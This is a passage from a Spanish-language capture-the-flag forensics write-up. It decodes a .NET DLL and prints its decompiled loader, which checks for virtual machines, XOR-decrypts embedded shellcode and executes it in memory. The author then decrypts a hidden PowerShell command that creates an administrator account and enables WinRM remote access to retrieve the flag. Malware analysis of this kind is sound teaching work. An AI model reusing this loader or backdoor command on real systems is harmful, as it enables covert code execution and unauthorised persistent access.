AAAL6UpfGecyyf94KKIWzLw93Ks61IzDZpyk3d6EtDQSrJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAAHAMAAAAAAAAAAAAAHAM0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBHwCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAFgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAA6AAkAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAdABlAHMAdABfAGQAbABsAAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA6AA0AAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAHQAZQBzAHQAXwBkAGwAbAAuAGQAbABsAAAAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAyADMAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEIADQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAAB0AGUAcwB0AF8AZABsAGwALgBkAGwAbAAAAAAAMgAJAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAAB0AGUAcwB0AF8AZABsAGwAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAACsMgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=' | base64 -d > malware
$ file malware
malware: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
$ mv malware malware.dll
Tenemos otra DLL, pero es diferente de la anterior:
$ md5sum malware malware.dll
a9b7ff8d6f86fe44886627a030514b18 malware
a0391305149087fcf5e121ebe1c3aff6 malware.dll
$ mv malware malware2.dll
De nuevo, vamos a descompilarlo:
// Warning: Some assembly references could not be resolved automatically. This might lead to incorrect decompilation of some parts,
// for ex. property getter/setter access. To get optimal decompilation results, please manually add the missing references to the list of loaded assemblies.
// SecurityUpdate.Updater
using System;
using System.Management;
using System.Runtime.InteropServices;
using SecurityUpdate;
internal class Updater
{
private delegate void ShellcodeDelegate();
public enum MemoryProtection : uint
{
PAGE_EXECUTE = 16u,
PAGE_EXECUTE_READ = 32u,
PAGE_EXECUTE_READWRITE = 64u,
PAGE_EXECUTE_WRITECOPY = 128u,
PAGE_NOACCESS = 1u,
PAGE_READONLY = 2u,
PAGE_READWRITE = 4u,
PAGE_WRITECOPY = 8u,
PAGE_GUARD = 256u,
PAGE_NOCACHE = 512u,
PAGE_WRITECOMBINE = 1024u
}
private static byte[] shellcode = new byte[1147]
{
66, 124, 39, 241, 158, 115, 76, 22, 18, 179,
74, 69, 231, 155, 243, 86, 152, 191, 38, 26,
216, 189, 27, 226, 66, 106, 162, 109, 114, 190,
// ...
203, 102, 92, 138, 154, 140, 136, 131, 236, 15,
167, 119, 48, 189, 12, 224, 232
};
private static byte[] key = new byte[32]
{
190, 148, 165, 241, 158, 115, 44, 159, 247, 130,
138, 33, 108, 203, 195, 221, 202, 179, 173, 72,
204, 54, 105, 202, 77, 221, 232, 75, 67, 65,
42, 201
};
public unsafe static void Run()
{
//IL_0008: Unknown result type (might be due to invalid IL or missing references)
//IL_000e: Expected O, but got Unknown
//IL_0027: Unknown result type (might be due to invalid IL or missing references)
//IL_002d: Expected O, but got Unknown
bool flag = false;
ManagementObjectSearcher val = new ManagementObjectSearcher("SELECT * FROM Win32_ComputerSystem");
try
{
ManagementObjectEnumerator enumerator = val.Get().GetEnumerator();
try
{
while (enumerator.MoveNext())
{
ManagementObject val2 = (ManagementObject)enumerator.get_Current();
string text = ((ManagementBaseObject)val2).get_Item("Manufacturer").ToString()!.ToLower();
if ((text == "microsoft corporation" && ((ManagementBaseObject)val2).get_Item("Model").ToString()!.ToUpperInvariant().Contains("VIRTUAL")) || text.Contains("vmware") || ((ManagementBaseObject)val2).get_Item("Model").ToString() == "VirtualBox")
{
flag = true;
break;
}
}
}
finally
{
((IDisposable)enumerator)?.Dispose();
}
}
finally
{
((IDisposable)val)?.Dispose();
}
if (!flag)
{
for (int i = 0; i < shellcode.Length; i++)
{
shellcode[i] = (byte)(shellcode[i] ^ key[i % 32]);
}
fixed (byte* ptr = shellcode)
{
IntPtr intPtr = (IntPtr)ptr;
VirtualProtect(intPtr, (UIntPtr)(ulong)shellcode.Length, MemoryProtection.PAGE_EXECUTE_READWRITE, out var _);
ShellcodeDelegate shellcodeDelegate = (ShellcodeDelegate)Marshal.GetDelegateForFunctionPointer(intPtr, typeof(ShellcodeDelegate));
shellcodeDelegate();
}
}
}
[DllImport("kernel32.dll")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, MemoryProtection flNewProtect, out MemoryProtection lpflOldProtect);
}
En este programa, hay un gran vector de bytes de shellcode que están cifrados con XOR utilizando un vector de bytes de clave. Usemos Python para descifrarlo:
$ python3 -q
>>> from pwn import xor
>>>
>>> shellcode = bytes((66, 124, 39, 241, 158, 115, 76, 22, 18, 179, 74, 69, 231, 155, 243, 86, 152, 191, 38, 26, 216, 189, 27, 226, 66, 106, 162, 109, 114, 190, 134, 245, 223, 232, 167, 221, 190, 178, 227, 146, 246, 69, 104, 211, 62, 156, 72, 143, 218, 56, 231, 116, 71, 122, 120, 178, 174, 149, 233, 154, 18, 202, 115, 233, 191, 71, 46, 184, 134, 144, 22, 214, 124, 182, 1, 32, 186, 250, 60, 113, 11, 124, 160, 73, 11, 14, 137, 191, 187, 222, 149, 179, 120, 60, 14, 188, 90, 204, 46, 169, 186, 114, 255, 249, 124, 142, 193, 170, 52, 215, 194, 14, 65, 183, 38, 73, 28, 191, 45, 238, 105, 134, 179, 42, 26, 27, 123, 54, 94, 203, 250, 171, 21, 97, 199, 18, 170, 232, 139, 172, 233, 121, 195, 221, 202, 227, 197, 121, 71, 89, 238, 53, 152, 102, 24, 254, 225, 23, 66, 111, 43, 41, 56, 14, 75, 79, 42, 227, 253, 2, 113, 193, 25, 206, 120, 154, 217, 193, 194, 34, 204, 101, 150, 31, 61, 178, 159, 46, 49, 50, 66, 172, 210, 248, 139, 148, 230, 22, 12, 178, 160, 235, 228, 69, 3, 188, 144, 169, 179, 223, 200, 104, 132, 95, 13, 174, 40, 179, 200, 102, 13, 46, 122, 187, 209, 242, 204, 157, 251, 83, 1, 218, 153, 225, 229, 69, 9, 175, 128, 178, 167, 222, 204, 38, 168, 22, 35, 139, 15, 170, 169, 12, 6, 0, 73, 190, 252, 238, 228, 185, 253, 50, 78, 232, 181, 251, 203, 102, 61, 138, 138, 156, 139, 138, 236, 11, 141, 119, 56, 189, 15, 171, 169, 12, 119, 0, 78, 174, 252, 248, 228, 185, 215, 50, 72, 222, 181, 215, 203, 102, 84, 138, 143, 140, 136, 231, 236, 15, 153, 119, 48, 189, 15, 236, 169, 3, 10, 0, 112, 152, 252, 192, 228, 185, 207, 50, 79, 248, 181, 242, 203, 102, 88, 138, 153, 170, 139, 212, 236, 11, 133, 119, 60, 189, 15, 236, 169, 3, 2, 0, 103, 190, 252, 237, 228, 183, 211, 50, 97, 232, 181, 232, 203, 105, 57, 138, 160, 186, 139, 201, 236, 14, 141, 119, 56, 139, 12, 236, 169, 3, 14, 0, 124, 190, 255, 227, 228, 185, 215, 50, 118, 222, 182, 234, 203, 98, 41, 138, 138, 186, 139, 212, 236, 11, 252, 119, 56, 155, 15, 167, 169, 13, 2, 0, 72, 136, 252, 252, 228, 182, 245, 50, 78, 248, 181, 215, 203, 102, 57, 138, 166, 156, 136, 131, 236, 11, 141, 119, 37, 155, 15, 154, 169, 12, 123, 0, 73, 174, 252, 254, 228, 182, 203, 50, 104, 206, 182, 201, 203, 100, 88, 138, 153, 140, 136, 128, 236, 11, 252, 119, 61, 139, 15, 171, 169, 12, 14, 0, 115, 152, 252, 231, 228, 183, 203, 50, 79, 232, 181, 238, 203, 105, 37, 138, 138, 156, 139, 218, 236, 13, 137, 119, 11, 173, 15, 236, 169, 12, 10, 0, 75, 152, 252, 238, 228, 178, 215, 50, 101, 222, 182, 246, 203, 103, 45, 138, 154, 140, 136, 201, 236, 0, 129, 119, 13, 189, 15, 171, 169, 3, 10, 0, 112, 136, 255, 243, 228, 178, 207, 50, 79, 222, 181, 234, 203, 105, 33, 138, 160, 170, 136, 128, 236, 15, 244, 119, 10, 173, 15, 182, 169, 8, 2, 0, 102, 152, 252, 209, 228, 182, 203, 50, 79, 232, 181, 232, 203, 105, 37, 138, 162, 140, 136, 196, 236, 0, 157, 119, 8, 155, 15, 171, 169, 12, 119, 0, 99, 136, 255, 253, 228, 180, 249, 50, 122, 222, 181, 193, 203, 105, 31, 138, 167, 170, 136, 201, 236, 15, 187, 119, 49, 189, 15, 171, 169, 3, 36, 0, 103, 152, 252, 255, 228, 181, 207, 50, 72, 222, 182, 250, 203, 101, 45, 138, 161, 186, 136, 213, 236, 12, 157, 119, 11, 173, 15, 182, 169, 13, 123, 0, 73, 174, 252, 165, 228, 185, 211, 50, 72, 222, 181, 183, 203, 103, 84, 138, 161, 140, 139, 201, 236, 15, 252, 119, 36, 139, 15, 164, 169, 3, 40, 0, 114, 190, 255, 164, 228, 185, 215, 50, 72, 222, 182, 250, 203, 102, 53, 138, 141, 156, 136, 217, 236, 0, 157, 119, 10, 189, 12, 181, 169, 8, 6, 0, 76, 152, 255, 253, 228, 176, 174, 50, 111, 248, 181, 192, 203, 102, 61, 138, 153, 156, 139, 199, 236, 13, 187, 119, 11, 189, 15, 183, 169, 12, 6, 0, 72, 136, 252, 220, 228, 185, 215, 50, 78, 232, 181, 179, 203, 105, 45, 138, 151, 140, 136, 223, 236, 15, 252, 119, 48, 173, 15, 177, 169, 3, 10, 0, 99, 136, 255, 224, 228, 180, 253, 50, 79, 248, 181, 244, 203, 105, 57, 138, 160, 156, 139, 212, 236, 11, 133, 119, 56, 155, 15, 182, 169, 12, 115, 0, 75, 152, 252, 225, 228, 182, 245, 50, 79, 232, 181, 178, 203, 105, 37, 138, 154, 140, 136, 131, 236, 15, 244, 119, 10, 173, 15, 167, 169, 8, 10, 0, 99, 136, 255, 224, 228, 180, 174, 50, 118, 206, 181, 246, 203, 102, 37, 138, 153, 140, 136, 202, 236, 11, 141, 119, 32, 173, 15, 159, 169, 12, 119, 0, 78, 152, 252, 253, 228, 182, 245, 50, 79, 232, 182, 235, 203, 96, 92, 138, 128, 186, 136, 245, 236, 15, 248, 119, 48, 155, 15, 180, 169, 12, 52, 0, 112, 152, 255, 224, 228, 183, 223, 50, 121, 232, 181, 209, 203, 102, 57, 138, 161, 140, 136, 197, 236, 0, 157, 119, 8, 155, 15, 168, 169, 12, 32, 0, 99, 136, 255, 224, 228, 180, 199, 50, 78, 232, 181, 251, 203, 102, 33, 138, 153, 140, 139, 253, 236, 9, 163, 119, 60, 189, 15, 237, 169, 12, 6, 0, 73, 174, 252, 164, 228, 178, 174, 50, 121, 232, 181, 238, 203, 105, 37, 138, 167, 186, 136, 195, 236, 15, 129, 119, 51, 155, 12, 186, 169, 13, 32, 0, 75, 152, 252, 225, 228, 183, 215, 50, 120, 206, 182, 204, 203, 96, 3, 138, 150, 170, 136, 223, 236, 0, 157, 119, 37, 155, 15, 137, 169, 12, 22, 0, 73, 174, 252, 166, 228, 182, 245, 50, 117, 232, 181, 238, 203, 98, 45, 138, 149, 170, 136, 195, 236, 15, 248, 119, 60, 173, 15, 147, 169, 8, 2, 0, 102, 152, 252, 192, 228, 185, 207, 50, 117, 206, 181, 251, 203, 105, 61, 138, 167, 140, 136, 196, 236, 14, 157, 119, 12, 155, 15, 170, 169, 12, 22, 0, 99, 136, 252, 214, 228, 185, 203, 50, 72, 222, 181, 244, 203, 102, 92, 138, 154, 140, 136, 131, 236, 15, 167, 119, 48, 189, 12, 224, 232))
>>> key = bytes((190, 148, 165, 241, 158, 115, 44, 159, 247, 130, 138, 33, 108, 203, 195, 221, 202, 179, 173, 72, 204, 54, 105, 202, 77, 221, 232, 75, 67, 65, 42, 201))
>>>
>>> xor(shellcode, key)
b'\xfc\xe8\x82\x00\x00\x00`\x89\xe51\xc0d\x8bP0\x8bR\x0c\x8bR\x14\x8br(\x0f\xb7J&1\xff\xac<a|\x02, \xc1\xcf\r\x01\xc7\xe2\xf2RW\x8bR\x10\x8bJ<\x8bL\x11x\xe3H\x01\xd1Q\x8bY \x01\xd3\x8bI\x18\xe3:I\x8b4\x8b\x01\xd61\xff\xac\xc1\xcf\r\x01\xc78\xe0u\xf6\x03}\xf8;}$u\xe4X\x8bX$\x01\xd3f\x8b\x0cK\x8bX\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89D$$[[aYZQ\xff\xe0__Z\x8b\x12\xeb\x8d]j\x01\x8d\x85\xb2\x00\x00\x00Ph1\x8bo\x87\xff\xd5\xbb\xf0\xb5\xa2Vh\xa6\x95\xbd\x9d\xff\xd5<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00S\xff\xd5powershell.exe -WindowStyle Hidden -NoProfile -EncodedCommand JABwAGEAcwBzAHcAbwByAGQAIAA9ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwAgACIAUwB1AHAAMwByAFMAMwBjAHUAcgAzAFAAQAA1AHMAVwAwAHIAZAAhACEAIgAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUADQAKAE4AZQB3AC0ATABvAGMAYQBsAFUAcwBlAHIAIAAiAEEAbgB1AGIAaQBzACIAIAAtAFAAYQBzAHMAdwBvAHIAZAAgACQAcABhAHMAcwB3AG8AcgBkACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAEgAVABCAHsAdwBzAGwAXwBvAHgAMQBkADQAdAAxADAAbgBfADQAbgBkAF8AcgB1AHMAdAB5AF8AbQAzAG0AMAByAHkAXwA0AHIAdAAxAGYANABjAHQAcwAhACEAfQAiAA0ACgBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAEcAcgBvAHUAcAAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBzACIAIAAtAE0AZQBtAGIAZQByACAAIgBBAG4AdQBiAGkAcwAiAA0ACgBFAG4AYQBiAGwAZQAtAFAAUwBSAGUAbQBvAHQAaQBuAGcAIAAtAEYAbwByAGMAZQANAAoAUwB0AGEAcgB0AC0AUwBlAHIAdgBpAGMAZQAgAFcAaQBuAFIATQANAAoAUwBlAHQALQBTAGUAcgB2AGkAYwBlACAAVwBpAG4AUgBNACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIABBAHUAdABvAG0AYQB0AGkAYwA=\x00'
El shellcode descifrado está tratando de ejecutar un comando de PowerShell que aparece al final:
powershell.exe -WindowStyle Hidden -NoProfile -EncodedCommand JABwAGEAcwBzAHcAbwByAGQAIAA9ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwAgACIAUwB1AHAAMwByAFMAMwBjAHUAcgAzAFAAQAA1AHMAVwAwAHIAZAAhACEAIgAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUADQAKAE4AZQB3AC0ATABvAGMAYQBsAFUAcwBlAHIAIAAiAEEAbgB1AGIAaQBzACIAIAAtAFAAYQBzAHMAdwBvAHIAZAAgACQAcABhAHMAcwB3AG8AcgBkACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAEgAVABCAHsAdwBzAGwAXwBvAHgAMQBkADQAdAAxADAAbgBfADQAbgBkAF8AcgB1AHMAdAB5AF8AbQAzAG0AMAByAHkAXwA0AHIAdAAxAGYANABjAHQAcwAhACEAfQAiAA0ACgBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAEcAcgBvAHUAcAAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBzACIAIAAtAE0AZQBtAGIAZQByACAAIgBBAG4AdQBiAGkAcwAiAA0ACgBFAG4AYQBiAGwAZQAtAFAAUwBSAGUAbQBvAHQAaQBuAGcAIAAtAEYAbwByAGMAZQANAAoAUwB0AGEAcgB0AC0AUwBlAHIAdgBpAGMAZQAgAFcAaQBuAFIATQANAAoAUwBlAHQALQBTAGUAcgB2AGkAYwBlACAAVwBpAG4AUgBNACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIABBAHUAdABvAG0AYQB0AGkAYwA=
Flag
Ahora decodificamos el comando:
$ echo JABwAGEAcwBzAHcAbwByAGQAIAA9ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwAgACIAUwB1AHAAMwByAFMAMwBjAHUAcgAzAFAAQAA1AHMAVwAwAHIAZAAhACEAIgAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUADQAKAE4AZQB3AC0ATABvAGMAYQBsAFUAcwBlAHIAIAAiAEEAbgB1AGIAaQBzACIAIAAtAFAAYQBzAHMAdwBvAHIAZAAgACQAcABhAHMAcwB3AG8AcgBkACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAEgAVABCAHsAdwBzAGwAXwBvAHgAMQBkADQAdAAxADAAbgBfADQAbgBkAF8AcgB1AHMAdAB5AF8AbQAzAG0AMAByAHkAXwA0AHIAdAAxAGYANABjAHQAcwAhACEAfQAiAA0ACgBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAEcAcgBvAHUAcAAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBzACIAIAAtAE0AZQBtAGIAZQByACAAIgBBAG4AdQBiAGkAcwAiAA0ACgBFAG4AYQBiAGwAZQAtAFAAUwBSAGUAbQBvAHQAaQBuAGcAIAAtAEYAbwByAGMAZQANAAoAUwB0AGEAcgB0AC0AUwBlAHIAdgBpAGMAZQAgAFcAaQBuAFIATQANAAoAUwBlAHQALQBTAGUAcgB2AGkAYwBlACAAVwBpAG4AUgBNACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIABBAHUAdABvAG0AYQB0AGkAYwA= | base64 -d
$password = ConvertTo-SecureString "Sup3rS3cur3P@5sW0rd!!" -AsPlainText -Force
New-LocalUser "Anubis" -Password $password -Description "HTB{wsl_ox1d4t10n_4nd_rusty_m3m0ry_4rt1f4cts!!}"
Add-LocalGroupMember -Group "Administrators" -Member "Anubis"
Enable-PSRemoting -Force
Start-Service WinRM
Set-Service WinRM -StartupType Automatic
¡Y finalmente, tenemos la flag!